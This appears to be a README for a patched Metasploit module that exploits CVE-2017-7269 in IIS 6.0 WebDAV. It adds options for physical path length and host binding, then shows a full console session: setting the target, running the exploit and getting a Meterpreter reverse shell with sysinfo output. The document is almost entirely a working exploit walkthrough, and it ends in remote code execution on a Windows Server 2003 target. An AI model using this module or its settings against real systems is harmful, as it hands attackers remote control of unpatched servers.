iis 6.0 CVE-2017-7269 Msf 反弹shell

### fixed msf module for cve-2017-7269 fix not work when length of physical path not equal to 19,or has a host binding. add options: `PhysicalPathLength`,`HttpHost` for test: host phyiscal path: `c:\inetpub\` , length=`11` msf > use exploit/windows/iis/cve-2017-7269 msf exploit(cve-2017-7269) > show options Module options (exploit/windows/iis/cve-2017-7269): Name Current Setting Required Description ---- --------------- -------- ----------- HttpHost localhost yes http host for target PhysicalPathLength 19 yes length of physical path for target(include backslash) RHOST yes The target address RPORT 80 yes The target port (TCP) Exploit target: Id Name -- ---- 0 Microsoft Windows Server 2003 R2 msf exploit(cve-2017-7269) > set rhost 192.168.223.130 rhost => 192.168.223.130 msf exploit(cve-2017-7269) > set rport 8088 rport => 8088 msf exploit(cve-2017-7269) > set physicalpathlength 11 physicalpathlength => 11 msf exploit(cve-2017-7269) > set httphost zcgonvh-test.com httphost => zcgonvh-test.com msf exploit(cve-2017-7269) > exploit [*] Started reverse TCP handler on 192.168.223.129:4444 [*] Sending stage (957487 bytes) to 192.168.223.130 [*] Meterpreter session 1 opened (192.168.223.129:4444 -> 192.168.223.130:1135) at 2017-03-30 18:13:41 -0400 meterpreter > sysinfo Computer : ZCG-AA4B4E60208 OS : Windows .NET Server (Build 3790, Service Pack 2). Architecture : x86 System Language : zh_CN Domain : WORKGROUP Logged On Users : 3 Meterpreter : x86/windows meterpreter >